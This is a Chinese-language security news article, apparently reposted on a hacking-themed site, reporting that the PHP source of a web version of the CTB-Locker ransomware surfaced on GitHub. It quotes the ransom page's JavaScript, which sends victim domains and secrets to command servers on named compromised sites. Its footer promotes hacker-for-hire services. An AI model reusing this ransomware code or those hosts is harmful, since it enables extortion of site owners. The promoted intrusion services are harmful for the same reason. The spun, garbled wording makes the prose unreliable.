当前位置：首页 > 黑客技术 > 正文内容

Web版勒索软件CTB-Locker PHP源码现身GitHub

访客4年前 (2021-04-15)黑客技术1118

勒索软件CTB-Locker呈现其Web演化版别，可感染网页站点。据剖析，其编码为选用PHP编写，现在源码已被保管至GitHub上。
Web版勒索软件CTB-Locker的初次呈现
就在本年西方情人节前夕，英国的一位站长却有一个不愉快的发现，他查看到其办理的网站页面遭受篡改，篡改页面上呈现的信息看起来跟电脑感染歹意勒索软件的景象类似，其主要信息是让站点办理员付出比特币，交换相应目录文件的解密，以便使站点康复正常。篡改页面如下图，

在被验证为初次针对网页的勒索工作后，该工作便得到极大的重视。但其实作为服务器办理员来说，初步都只是期望这仅仅是一次性工作，而不是进犯者预谋的初步。
在初始阶段，实际上并无发现其他感染工作，而状况在曩昔的一个星期中有了极大的改变。在这段时间内频频呈现上述的网页勒索感染工作。据悉，到现在有超越100个同类型工作被发现。在篡改的信息中其暗地操纵者要求受害者付出0.4个比特币，而且如在两天内未完成付出，付出额度将提高至0.8个比特币。以下为其要求付出比特币的源码：
script>
admins = ["http://orangecountyplasterandstucco.com/access.php", "http://klinika-redwhite.com/access.php", "http://charoenpan.com/access.php"];
iadmin = 0;
domain = encodeURIComponent(window.location.href.replace('http://', '').replace('https://', '').split('/')[0]);
function post_admin(postdata, onsuccess) {
   $.post(admins[iadmin], postdata+"&domain="+domain, function (data) {
         if (data["status"] == "success") {
            onsuccess(data);
         } else {
            alert(data["status"]);
         }
      }, 'json'
   ).fail(function() {
      alert(iadmin >= 2 ? 'It seems like our server is down=( Try to push it again' : 'Push it again');
      iadmin = (iadmin + 1) % 3;
   });
}
$('#decrypt').click(function() {
   post_admin("decrypt=", function(data) {
      alert('Your decryption key is ' + data["decrypt"] + '! Wait while page will be updated!');
      url = window.location.href + (window.location.href.indexOf('?') !== -1 ? '&' : '?');
      window.location.href = url + 'decrypt=' + data["decrypt"] + '&secret=' + data["secret"] + '&dectest=' + data["dectest"];
   });
});
$('#dectest').click(function() {
   post_admin("dectest=&secret="+($("#secret").val()), function(data) {
      alert('Your test decryption key is ' + data["dectest"] + '! Wait while page will be updated!');
      url = window.location.href + (window.location.href.indexOf('?') !== -1 ? '&' : '?');
      window.location.href = url + 'dectest=' + data["dectest"] + '&secret=' + data["secret"];
   });
});
$('#sendmsg').click(function() {
   msg = "&msg=" + encodeURIComponent($("#chatmsg").val());
   post_admin("sendmsg=&secret="+$("#secret").val()+msg, function(data) {
      alert('Thank you for feedback!');
   });
});
$('#recvmsg').click(function() {
   post_admin("recvmsg=&secret="+$("#secret").val(), function(data) {
      $("#chatmsg").val(data["answer"]);
   });
});
   script>
该勒索程序在勒索付出告诉上，跟CTB-Locker为同一模型。但单单从技术上来看，这跟“声名远扬”的CTB-Locker勒索软件的状况不符。因其仅运转于Windows桌面环境，而并无法运转在 Linux Web服务器上。
Web版CTB-Locker选用PHP编写
来自 Stormshield的安全剖析员Benkow，设法剖析勒索软件的运转形式并从一个受感染的目标提取到了源代码。随后，Benkow将Web版CTB-Locker 源码上传至 KernelMode论坛上，供其他安全研讨人员剖析和研讨。而Web版CTB-Locker的“知名度”便敏捷提高，其源码也被保管至GitHub。
源代码地址请点击：GitHub
考虑到，此前勒索软件Hidden Tear源码也保管至GitHub，但工作终究却没有朝着有利于用户的方向发展。而结合当时的景象，能够预见，在接下来的数个月中，将或许呈现大规模的针对网页站点进行的进犯感染。

[1] [2] 黑客接单网

扫描二维码推送至手机访问。

本文链接：http://therlest.com/106622.html

分享给朋友：

返回列表

上一篇：wx的聊天记录怎么恢复(索尼dsc wx500)

下一篇：漏洞挖掘的艺术-面向二进制的静态漏洞挖掘 - FreeBuf网络安全行业门户

“Web版勒索软件CTB-Locker PHP源码现身GitHub” 的相关文章

今天的汽油单价 - 今日燃油价格最新行情

4点59元调为5点02元，不同批次价格会有差距，经常堵车路况差的情况下，93#汽油7点71元/升、20:29单位：人民币，情况今天零时起。 92号汽油，0 号柴油每升上调0点04元。更别说不同地区了，92号汽油，上调0点37行情元；93号，最高限价，决定从。 92汽油官方价6点柴油价：6点：5点90...

接单的黑客_可以找黑客黑美团吗

有在网络安全范畴中，猜测网络违法和歹意软件发展趋势好像现已成为了各大网络安全公司的传统了。为了防止让咱们去阅览上百页的安全陈述，咱们专门整兼并总结了McAfee、Forrester、FiskIQ、卡巴斯基实验室【1、2、3】、WatchGuard、Nuvias、FireEye、CyberArk、F...

黑客了解,中国黑客越南网络apt,黑客网站密码破解工具

6.42 · hxxp[://]offlineearthquake[.]com/file//?id=&n=000 进程三：使命履行及实时数据剖析10.61 2019年6月19日，FireEye Endpoint Security设备上收到了缝隙检测警报。违规应用程序被辨认为Microso...

Webshell安全检测篇

0x00 依据流量的检测办法 1.概述笔者一直在重视webshell的安全剖析，最近就这段时刻的心得体会和咱们做个共享。 webshell一般有三种检测办法：依据流量方法依据agent方法（本质是直接剖析webshell文件）依据日志剖析方法 Webshell的分...

如何查询酒店开房记录？谁可以查？网上怎么查？

关于酒店开房记录，这个基本上是看不到的，只有公检法系统（主要是公安局）才能查询的。如果你真想查询，要提供相关真实的身份证明，到公安局咨询，可能需要繁琐的手续。 2014年初，网上就有过“2000W开房数据泄露”的惊爆新闻，是因众多酒店使用了浙江慧达驿站公司开发的酒店Wi-Fi管理、认证系统，而该公司...

如何寻找黑客微信号（只有一个微信号,黑客可以查到对方吗）

一、如何寻找黑客微信号（只有一个微信号,黑客可以查到对方吗） 1、有黑客能查到微信聊天记录是骗人的吗绝对是骗子,请勿相信! 微信聊天信息保存在本地一般聊天信息都是保存在本地的,除非开通会员可以将聊天信息存储。黑客查找出来的微信聊天截图是真的吗在手机端启动微信,在微信主界面底部导航中点击“微信”...